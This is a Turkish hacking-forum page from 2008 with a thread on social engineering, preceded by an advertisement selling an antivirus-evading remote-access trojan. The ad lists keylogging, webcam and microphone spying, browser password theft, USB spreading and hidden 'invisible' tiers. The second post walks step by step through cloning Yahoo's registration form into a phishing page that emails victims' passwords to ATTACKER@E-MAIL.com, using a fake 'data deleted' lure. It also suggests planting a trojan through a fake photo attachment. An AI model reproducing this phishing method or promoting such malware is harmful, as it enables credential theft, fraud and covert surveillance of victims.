Social Enginnering

Sosyal Mühendislik 1- GERÇEK HİKAYELER: Adı bilinmeyen bir kişi telefonla aradığı bir bayana,kendisinin yerel bir şirketin müşteri hizmetlerinden olduğunu ve yaptıkları yerel bir hata yüzünden kredi kart bilgilerinin ve sosyal Konu w@rh@ck3r tarafından açılmış, 202 kişi tarafından görüntülenip, 1 yanıt almış.

Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!

Karşı sistemi kendi makineniniz gibi kullandıran uzaktan yönetim programı.
  • Canlı ekran izleme,vnc ve mouse kontrolü
  • Antiviruslerce %100 tanınmaz, güncelleme garantili
  • Ortam sesi dinleme
  • Webcam izleme
  • Online/offline keylogger
  • Kopyala/Yapıştır, Clipboard Yöneticisi (Canlı)
  • Warlogger desteği
  • Çalıştırma,upload,download,yeniden adlandırma,silme,gizli çalıştırma,thumbnail görüntüleme(indirmeden dosya görme)
  • Registry yöneticisi (tam özellikli)
  • Msn şifrelerini ve geçmişteki tüm adresleri çıkartma
  • Firefox şifrelerini çözme
  • Görev yöneticisi, görev sonlandırma
  • Çalışan programları listeleme
  • Bağlı sistemlerin yaptığı işlemleri tek listede görme!
  • Binder / dosya birleştirici
  • Virus tipinde resource kullanmadan bindleme özelliği
  • Mp3,resim,jpeg,vs her türlü dosya ile birleşip,exploitler ile link üzerinden,htmlden yayılır
  • Keyloggerda dll kullanmadan system hooklarıyla loglama ve tabii dll kullanmadan kimse yapamıyorken %100 sisteme zarar vermeden stabil bütün dünya dillerinde loglama.
  • Internet Explorer 9 şifre çözme
  • Chrome Şifreleri (bütün sürümler)
  • Firefox Şifreleri (bütün sürümler)
  • Internet Exporer Şifreleri (bütün sürümler)
  • Safari Şifreleri (bütün sürümler)
  • Reklam Bot ile site reklamı, dosya yükletme, bulaştırma,vs. MSN,Yahoo Messenger,ICQ ve AIM sistemlerinin hepsini tanır. Reklam bot aynı anda birden fazla sisteme komut verebilir.
  • Browserda geçmiş verileri, form girdilerini kayıt edip trojandan erişme
  • Klavye Kilitleme
  • Mouse Kilitleme
  • Masaüstü Gizleme
  • Sistemlere takılı flash/usb disk varsa bulaştırma Birden fazla sisteme aynı anda autorun oluşturabilir.
  • Uzaktan exe yükletme Aynı anda birden fazla sisteme exeleri tek komutla yükletebilir.
  • Fake sistem kilitleme. Tek tıklama ile karşı sistemi restart/yeniden başlat moduna geçmiş gösterip kilitleme. Kullanıcı fişten çekmediği sürece siz istemedikçe bilgisayarı kapatamaz, yeniden başlatamaz.
  • Karşı sistemin yeniden başlatılma talebinde masaustu ve bütün ekranı kapanıyor gibi gösterip kapanış sesini çalara kullanıcıyı bekletme. Kullanıcı sistemi kapatmak istediğinde siz izin vermezseniz windows kapanmaya çalışıyor gibi görünür ancak yonetim panelinden her türlü işlem yapılır.
  • Sistem servislerini yönetme
  • Outlook şifreleri çözme. (bütün outlook versiyonları outlook expressler dahil)
  • Otomatik güncelleme özelliği ile yakalanma durumunda kısa sürede otomatik güncelleme alma
Sadece 690 TL! Satın almak için iletişim formunu kullanabilirsiniz.


Ayrıca, iki farklı üst sürümü var:
Özel Trojan 990 TL: İstediğiniz isimle çalışıp, istediğiniz yere kopyalanır ve başlangıçta, msconfig'de, registry'de görünmez.
ÖZEL TROJAN 1490 TL: Görev yöneticisinde ve sistemin hiç bir yerinde görünmez.


Sürümler: 1200 TL: - Kimsenin bulamayacağı şekilde çalışır!> m3hm3t. 1750 TL: %100 gizlidir, RAM'de çalışır ve bentrojanim.exe olarak çalışsa dahi hiç bir yerde görünmez.

Wardom.Com.TR bir bilgisayar güvenliği sitesidir; hack konuları bilgisayar güvenliğinin ve bilgisinin uç noktaları olduğundan dolayı, kullanıcıları bu konularda bilgilendirmek ve güvenliklerini arttırmak için yazılmaktadır.

Geri Dön   Wardom.Com.TR > Bilgisayar Güvenliği > Yeni Başlayanlar İçin
Sayfayı Yenile Social Enginnering
Üye Ol Sözlük Üye Listesi Arama Yeni Mesajlar Forumları Okundu İşaretle

Konu Başlıkları: enginnering social
Üye Olmadan Yorum Yazmak İçin Tıklayın!
Social Enginnering konusundaki toplam yorum: 1, okunma sayısı: 202.
 
Eski 13-09-2008, 02:20   #1
w@rh@ck3r
Forum Kalfası
 
w@rh@ck3r's Avatar
 
Kayıt Tarihi: Oct 2006
Üye numarası: #90482
Yer: Avusturya
Mesaj sayısı: 950
Karma etkisi: 666 w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000
Karma: 66099
Social Enginnering
Sosyal Mühendislik

1- GERÇEK HİKAYELER:

Adı bilinmeyen bir kişi telefonla aradığı bir bayana,kendisinin yerel bir şirketin müşteri hizmetlerinden olduğunu ve yaptıkları yerel bir hata yüzünden kredi kart bilgilerinin ve sosyal güvenlik numaralarının silindiğini söyler.

Bu kişi sözkonusu kişiden İsim ve soy ismini, adresini, kredi kart numarasını, sosyal güvenlik numarası gibi bilgilerini alır. Bu olay üzerinden 20 gün gibi bir süre geçtikten sonra o kişiye gelen 2500 dolarlık faturanın detayları şöyledir;

1 diz üstü bilgisayar,3 mp3 çalar ve 2 dvd oynatıcı.

Elbette ki tüm hackerların her zaman bilgisayar başında ,açıkları bulunan servisleri sömürme yoluyla kredi kartı numarası gibi özel bilgilere ulaştıkları söylenemez.

Bazen hackerlar ın tüm yaptığı bir insanı telefonla arayarak onun aptallığını sömürmektir.

24 farklı güvenlik acentesinde güvenlik test emri bulunan ABD genel hesap ofisi baş teknoloji uzmanı Keith A. Rhodes e göre bir şebekeye girebilmek ve sömürebilmek için her zaman mevcut bir yol vardır ya da bulunabilir fakat bazen insanların arasına karısarak ve onları kandırarak onların kendi güvenliklerini tehlikeye atmalarını sağlamak daha kolaydır.

MCommerce güvenliğinde görevli bir güvenlik uzmanı olan Kapil Raina tarafından; Yeni Başlayanın rehberi :

Önceki bir işverenle asıl işyeri tecrübesi temelli.

Hikaye şöyledir;

Bundan bir kaç yıl önce bir sabah bir grup yabancı büyük bir ticaret filosu firmasına yürüyerek girerler ve filonun tüm mali bilgilerini tamamen ele geçirdiler. Bunu nasıl yapmışlardı ? Firmanın bir kaç farklı çalışanının numarasıyla azar azar erişimin küçük miktarlarını elde ederek yapmışlardı.

Öncelikle şirkete ayak basışlarından 2 gün kadar önce şirket hakkında ön araştırma yapmışlardı.

Örneğin ön kapıda sanki anahtarlarını kaybetmiş gibi numara yaptılar ve bir adam onların içeri girmelerine izin verdi. Daha sonra 3. güvenlikli kapıyı geçmek için gülümseyerek kimlik rozetlerini kaybettiklerine inandırdırdıkları görevliye kapıyı açtırmayı başardılar.

Bu yabancılar CFO şirketinin şehir dışında olduğunu bildiklerinden ofise rahatlıkla girerek şirket bilgisayarlarındaki tüm mali veriyi elde ettiler. Çöp karıstırırcasına tüm faydalı dökümanları aradılar ve buldular. Ve daha sonra buldukları dökümanları kapıcıdan istedikleri çöp kutusunun içine saklayarak tüm veriyi bina dısına cıkardılar.

Bu yabancılar aslında CFO şirketi için bir güvenlik denetimi yapmak üzere tüm bunları tasarlamış olan ve şirket adına çaılşan güvenlik uzmanlarıydılar ve şirket çalışanlarını sosyal mühendislik sayesinde kandırmayı başarmışlardı.

2-TANIM

Sosyal mühendisliğin temel amaçları hakkında bir çok makale okumuş biri olarak hackerlar tarafından bir çok farklı yollarla kullanılan Sosyal Mühendiliğin basitçe tanımını şöyle yapabilirim;

Sahtekarlık ve casusluk yapabilmek için direk bir insana karşı bazı ikna özelliklerinin kullanılarak ya da bir sistem ya da şebekeye direk erişmek olarak tanımlanabilir.

Hedefler;ticari şirketler,mali ve kültürel kurumlar,hastaneler oalbilirken kimi zamanda basit bir yahoo hesabı olabilir.

3-İKNA VE ETKİ TEKNİKLERİ

OTORİTE:

Sosyal psikoloji edebiyatı açısından bir kişiyi ikna etmek ya da etkileyebilmek için çevresel şartlarında önemli olduğu bir durumda 6 muhtemel faktör olduğu varsayılır.

3 Midwestern Hastanesinde yapılan bir çalışma göstermiştir ki insanlar otoriter konumdaki kişiliklerin sorularına daha kolay ve rahat yanıt vermekte otoriter kişiler insanları daha kolay etkileyebilmektedirler.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=231368

Yapılan çalışmada 22 ayrı hemşirenin bulunduğu hastanede kendisini doktor olarak tanıtan bir kişi hemşirelere koğuşta bulunan özel bir hastaya 20 miligramlık özel bir dozajda günde 2 kez ilaç verilmesini söyler.

Hemşireler daha önce hiç görmedikleri ve konusmadıkları bu kişinin kendisini doktor olarak tanıtmasından dolayı herhangi bir şüpheye düşmemişlerdir.

Olayların %95 inde doktorun belirttiği dozun cok tehlikeli olduğunu bildikleri halde hemşireler koğuş ilaç kabininden zorunlu-sözde doktorun-belirttiği ilaç miktarını almaya devam etmişlerdir. Tabi daha sonra gözlemciler tarafından hemşirelere olay açıklanmıştır.

KITLIK:

İnsanlar bir dönem boyunca az ya da sınırlı olan özel bir madde söz konusu olduğunda göstergelere yüksek ölçüde yanıt vermektedirler.

Doktor Jack Brehm in Stanford Üniversitesinde yaptığı araştırmaya göre insanların özgürlüğünü elinden alan ya da kısıtlayan bu durumlarda kişinin madde üzerindeki ilgisi daha fazla artmakta ve aşırı bil hal almaktadır.

Hatta araştımalar göstermiştir ki maddenin kısa süreli tedarik edilmesi sonucunda maddeye olan ihtiyaç ve istek daha da artmaktadır.

BEĞENME VE BENZERLİK:

Aynı karakteristik özelliklere sahip yada benzer spor,müzik,sanat eğilimleri bulunan ve doğum yerleri aynı olan kişilerin birbirini etkilemesi ve teşvik etmesi daha kolay olmustur.

KARŞILIK VERME:

İyi bir sosyal iletişim kuralının gerektirdiği gibi herhangi bir kişi bize bir şey verirse biz de kendimizi ona bir şey verme zorunlulugu hissederiz; öyle ki kişi istediği herhangi bir şeyi karşı taraftan istemeden,karşı taraf kendiliğiden iyiliği yaparsa kuşkusuz yardım edilen kişi-iyiliğin karşılıklı olduğu kuralına riayet etmek için- iyiliğin karşılığını vermekte daha kuvvetli bir yükümlülük hisseder.

TAAHHÜT VE TUTARLILIK:

Kişinin toplum içindeki yerini belirleyen en büyük unsurlardan bir tanesi tutarlılıktır. Eğer biz,verdiğimiz bir sözü tutmaz yada yapacağımızı söylediğimiz bir olayı gerçekleştirmekte başarısız olursak toplum içinde neredeyse tamamen güvenilmeyen ya da istemenyen bir kişi pozisyonuna düşebiliriz. İşte bu yüzden sözlerimizin arkasında durabilmek için bu yolda oynayabilmek için büyük acılar çekilecek olsa bile bunları göze almalıyız. Aradan uzun zaman geçtiğinde tutarlılık adına yaptıklarımızn gerçekten akılsızlık gibi görünse bile.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=231368

Sosyal Geleneğin ve pratiğin bizleri kişinin tutarlılığına inandırdığı yollardan birisi,kişinin -yazma- işini nasıl kullandığıdır.

Sosyal Psikolog Robert Cialdini’ye göre -aksini ispat eden bir kanıt yoksa- insanlar kendilerine söylenen bir cümlenin söyleyen kişinin gerçek görüşü olduğuna inanmaya eğilimlidirler. Üstelik eğer kişi cümlesini kendi kelimeleriyle yazmışsa buna ek olarak bu cümlelerini bir mektup,bir e-posta yada yeminli bir ifade şeklinde ve kendi inançları ve görüşlerini de ekleyerek yazıp yollamışsa karşısındakini etkileme şansı daha fazladır.

SOSYAL KANIT:

Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=231368
Bir çok sosyal durum karşısında neyin uygun olup olmadığını kararlaştırmamızda bizim güvendiğimiz kısa yollardan biri çevremizdeki insanları izleyerek onların ne yaptıklarını ya da bir durum karşısında ne diyeceklerini düşünmemizdir. Bu sosyal kanıt olarak bilinen olguya göre yapacağımız üzerinde fazla düşünmeden harekete geçtiğmiz için kimi zaman bu hareketler bizim kişisel çıkarlarımıza ters düşebilir.
w@rh@ck3r Çevrimdışı   Alıntı Yaparak Cevapla

Görüntülediğiniz konu içerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanunun 8. Maddesine ve T.C.Knın 125. Maddesine göre yayınlanmakta olup içeriğinden yazarı sorumludur. Bu konu hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.
Eski 13-09-2008, 02:21   #2
w@rh@ck3r
Forum Kalfası
 
w@rh@ck3r's Avatar
 
Kayıt Tarihi: Oct 2006
Üye numarası: #90482
Yer: Avusturya
Mesaj sayısı: 950
Karma etkisi: 666 w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000w@rh@ck3r seviye: 2000
Karma: 66099
4-HACKER LARIN KULLANDIĞI BAZI YÖNTEMLER:

İnternet Sahtekarlığı Adına Bazı Online Uygulamalar

E-Posta Parolaları Ve Kredi Kartı Numaraları

Şimdi bu kısımda sizlere açgözlülüğün etkilerinden bahsedeceğim. Düşünün ki kurban kendisine gelen Mercedes-2003 veya 10 bin dolar teklif eden kendisinin kullanıcı adını ve parolasını almaya yönelik düzenlenen hatta kimi zaman kredi kartı numarasını ya da sosyal güvenlik numarasını talep eden bir e-postayı istenilen bilgileri yazarak cevaplıyor.

Bu teknik çoğunlukla kullanıcıların kredi kartlarını ya da e-posta bilgilerini hedef alır.

Bir diğer bilinen klasik tuzaklardan biri müşterilere bir hata dolayısıyla silinen isim, soyisim, parolaların, doğum tarihi ve gizli sorunun cevabı kim bilgierin kurbana kayıt formu şeklinde gönderilerek bu bilgilerin ele geçirilmesi metodudur.

Mutlaka ki hacker ın iyi bir html, java ya da php programcısı olmasına saatlerini harcayarak html kodlaması yapmasına gerek yoktur.

Sadece ihtiyacı olan,kurbanı inandırabileceği ve e-posta yı cevaplatarak bilgileri elde edeceği bu formu oluşturabilmektir.

Herşeyden önce eminim ki çoğunuz bir html formunun nasıl çalıştığını biliyorsunuz.

Şimdi 5 dakikadan az bir sürede nasıl html formu yapıldığını görelim.

Evet, diyelim ki bir yahoo hesabının parolasıyla ilgileniyoruz. Hacker öncelikle saldırının etki biçimini ve otorite etkisini belirlemelidir. İlk olarak yahoo mail sayfasına girerek kişinin formu kayıt formu doldururken neler yazabileceğini düşünür ve bunları dener.


( http://edit.yahoo.com/config/eval_register?

.v=&.intl=&new=1&.done=&.src=ym&.partner=&.

p=&promo=&.last=so)

yukarıda ki formumuz ve ihtiyacımız olan bir kaç öğeyi değiştirmektir.

2.Adımda sayfanın html kaynağını almaktır. Çünkü üzerinde değişiklik yapacağız. Aldığımızda tek yapmamız gereken -silmek- olacak.

(<FORM name=IOS onsubmit="return hash(this)"

action=https://edit.yahoo.com/config/register)

Yahoo web script ile veriyi işleme koyduktan sonra bilgileri kendi scriptimizde http adres yerine yazıp yolladıktan sonra aşağıda kalan verileri sileceğiz.

<INPUT type=hidden

value=1 name=.save> <INPUT type=hidden value=0 name=.accept> <INPUT type=hidden

name=.demog> <INPUT type=hidden name=.done> <INPUT type=hidden name=.fam> <INPUT

type=hidden name=.i> <INPUT type=hidden name=.last> <INPUT type=hidden value=ym

name=.src> <INPUT type=hidden value=0 name=.regattempts> <INPUT type=hidden

name=.partner> <INPUT type=hidden name=promo> <INPUT type=hidden name=.ignore>

<INPUT type=hidden name=.pwtoken> <INPUT type=hidden value=ets8ig8vfdqbg

name=.u> <INPUT type=hidden value=1 name=.v> <INPUT type=hidden name=.md5>
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=231368

<INPUT type=password maxLength=32 name=.pw <INPUT type=password maxLength=32 name=.pw2

Evet şimdi formu değiştirdik ve ihtiyacımız olan küçük bir php perl scripti oluşturmak bunu 2 şekilde yapabiliriz hazır bir perl scripti yükleyerek uygun bir server a yerleştirmek ya da hacker in metin ismini bildiğini varsayarak bir arama motoru yoluyla scripti bulması olacaktır.

Ve şimdi gerekli herşeye sahibiz;

Bu hacker ın e-posta bilgileridir-verinin dönüş yapacağı yer-

<input type=hidden name="recipient" value=" ATTACKER@E-MAIL.com">

Bu mailin konusu;

<input type=hidden name="subject" value="Successfully hacked">

Gerçekten çok ihtiyaç olmasa da kurbanın ıp adresi ve host ismi;

<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT,REMOTE_ADDR">

Bu da kurban formu doldurduktan sonra ağ posta metninin yönleneceği yer;

<INPUT TYPE="HIDDEN" VALUE=" http://mail.yahoo.com" NAME="********">

En önemlisi,kurbanın şifre bilgileri;

<INPUT type=password maxLength=32 name="passwd"

<INPUT type=password maxLength=32 name="passwd2"

Ve son olarak hacker aşağıdaki gibi bir mesaj ekleyebilir.

Veri tabanımızdaki bir hata yüzünden tüm bilgileriniz silinmiştir. Lütfen bir kaç dakikanızı ayırıp aşağıdaki bilgileri doldurunuz.Teşekkürler.

Şimdi geri kalan admin@yahoo.com ya da service@yahoo.com gibi bir mail adresi almak.

Kurbanı etkilemeni bir çok yolu vardır.

Html formu yollamak, Truva atlatıyla etkilediği sisteme girmek gibi.

Bunun iyi bir örneği;

Bir hacker konştuğu kişiye arabasının satılık ve oldukça ucuz olduğundan bahseder. Daha sonra kurbana içinde arabanın resminin bulunduğu ekli bir mail yollayarak truva atını kurbanın bilgisayarına bırakır.

İNTERNET ÜZERİNDEN YAPILAN AÇIK ARTTIRMALAR;

Yukarıda bahsettiğimiz 3 psikolojik etkiyi kurban üzerinde oluşturup inanması sağlandıktan sonra üzerinde açık arttırma yapılan malın bedelinin kurbana ödetilmesi sağlanır.

5-SOSYAL MÜHENDİSLİĞİ ÇEVİRMEK:

İstenilen bilgiyi kazanmanın son metodu olarak sosyal mühendisliği çevirmeyi gösterebiliriz.

Yine otoriteyi kullanarak hacker insanların karşısına öyle bir pozisyonda çıkar ki, örneğin bir işyerindeki işçiler herhangi bir iş için tüm plan,uygulama ve analiz durumlarını sosyal mühendisten almaya başlarlar.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=231368

6-SON:

Sosyal Mühendisliğin çok çeşitli yolları vardır.

Bunlar e-posta göndererek backdoor oluşturarak yapılabilir.

İnsanların cehalet ve aptallıkları yamanmadığı sürece Sosyal Mühendislik hep etkili olacaktır.
w@rh@ck3r Çevrimdışı   Alıntı Yaparak Cevapla

Üye Olmadan Yorum Yazmak İçin Tıklayın!
Konudaki toplam yorum: 1, okunma sayısı: 202.
Cevapla

« Önceki Konu | Sonraki Konu »




Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)
 
Konu Araçları Bu Konuda Ara
Bu Konuda Ara:

Gelişmiş Arama

Gönderme Kuralları
You may not post new threads
You may post replies
You may not post attachments
You may not edit your posts
BB code is Açık
Smilies Açık
[IMG] Kodu Açık
HTML Kodu Kapalı
Forum Seç


Hacking ve Bilgisayar Güvenliği Öğrenmek İçin!

Forum saati Türkiye saatine göredir. GMT +3. Şuan saat: 23:03.
(Türkiye için GMT +2 seçilmelidir.)

Bize Yazın - Wardom.Com.TR - Arşiv - Başa Dön - Kullanım Sözleşmesi - Gizlilik Bildirimi

Wardom.org


İçerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. Wardom hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.